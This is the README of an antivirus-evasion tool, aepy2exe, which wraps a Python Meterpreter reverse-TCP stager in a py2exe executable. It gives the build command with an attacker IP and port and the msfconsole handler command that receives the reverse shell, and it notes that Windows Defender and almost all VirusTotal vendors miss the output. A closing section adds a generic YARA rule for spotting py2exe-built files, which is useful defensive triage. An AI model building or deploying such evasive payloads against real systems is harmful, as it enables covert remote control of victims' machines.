Simple Python script to evade antivirus on fully patched and updated Windows environments by packing a Python Meterpreter stager with py2exe.
python aepy2exe.py -ip 192.168.1.10 -p 443
C:\>python aepy2exe.py -h
Antivirus Evasion Py2exe
[ASCII art banner]
usage: aepy2exe.py [-h] [-e EXECUTE] [-ip ATTACKER_IP] [-p PORT]
Antivirus Evasion Py2exe
optional arguments:
-h, --help show this help message and exit
-ip ATTACKER_IP, --attacker_ip ATTACKER_IP
specified attacker IP
-p PORT, --port PORT specified attacker port
Example:
C:\>python aepy2exe.py -e py2exe -ip <ip_address> -p <port>
The script will generate CyberY.exe.
If the build fails with an error such as "The system cannot open the device or file specified", run the script again.
C:\>.\CyberY.exe
sudo msfconsole -x "use exploit/multi/handler; set PAYLOAD python/meterpreter/reverse_tcp; set LPORT 443; set LHOST 192.168.1.10"
msf6 exploit(multi/handler) > exploit
A YARA rule is included so you can identify the generated file yourself, since Windows Defender does not detect it.
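As an added example (not the rule that ships with aepy2exe), the following generic YARA rule shows the kind of check a defender can run on the output. It assumes only two things that are characteristics of py2exe itself, not of this tool: the loader stub looks up an embedded resource named PYTHONSCRIPT, and the bundle references the Python runtime DLL. It therefore flags any py2exe-built executable, legitimate or not, and is a triage aid rather than a verdict on the payload inside.

```yara
rule py2exe_bundled_executable
{
    meta:
        description = "Generic: Windows PE built with py2exe (loader stub plus embedded PYTHONSCRIPT resource)"
        note        = "Added example for triage; assumes py2exe markers, not anything specific to aepy2exe"

    strings:
        // Resource name the py2exe loader stub requests at start-up (assumed py2exe marker)
        $marker = "PYTHONSCRIPT" ascii wide
        // Name of the bundled Python runtime DLL, e.g. python39.dll (assumed py2exe marker)
        $pydll  = /python3\d{1,2}\.dll/ ascii wide nocase

    condition:
        // MZ header and PE signature at e_lfanew: only look at real PE files
        uint16(0) == 0x5A4D and
        uint32(uint32(0x3C)) == 0x00004550 and
        $marker and $pydll
}
```

Run it with `yara -s py2exe.yar CyberY.exe` to see which strings hit. Because it keys on the wrapper rather than on the stager, it survives changes to the Meterpreter stage but will also match unrelated py2exe applications, so pair it with context such as the outbound connection to the handler port.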
Keep in mind that antivirus bypass is a cat-and-mouse game. Whenever a new evasion technique becomes popular, antivirus vendors eventually learn about it and update their signature databases to block it. New evasion techniques then arise, vendors add those to their signature databases, and so on.
At the time of writing, the payload was flagged as malicious by only one vendor on VirusTotal.
Credit Marcelo Sacchetin